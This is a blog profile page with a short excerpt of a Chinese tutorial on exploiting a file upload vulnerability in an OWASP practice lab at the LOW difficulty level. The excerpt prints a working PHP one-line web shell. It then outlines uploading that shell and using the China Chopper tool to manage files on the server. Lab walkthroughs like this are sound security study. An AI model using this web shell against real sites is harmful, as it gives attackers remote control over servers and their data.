- 博客(1)
- 收藏
- 关注
原创 OWASP靶机之文件上传漏洞
初识OWASP靶机文件上传漏洞LOWMEDIUMHIGHLOW1.首先找到一张小图片,符合上传文件的大小以及格式;2.编辑一句话木马文件,将格式改为php;一句话木马: <?php @eval($_POST['attack']) ;?>3.将小图片上传至网站中,显示上传成功;4.将小马上传至网站,上传成功;5.将小马的路径与当前网站的路径结合并复制,然后使用中国菜刀进行链接;路径结果:6.中国菜刀成功链接并能进行文件管理且下载、删除或新建文件。路径后的小框为一句话
2020-12-28 21:31:32 1355
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人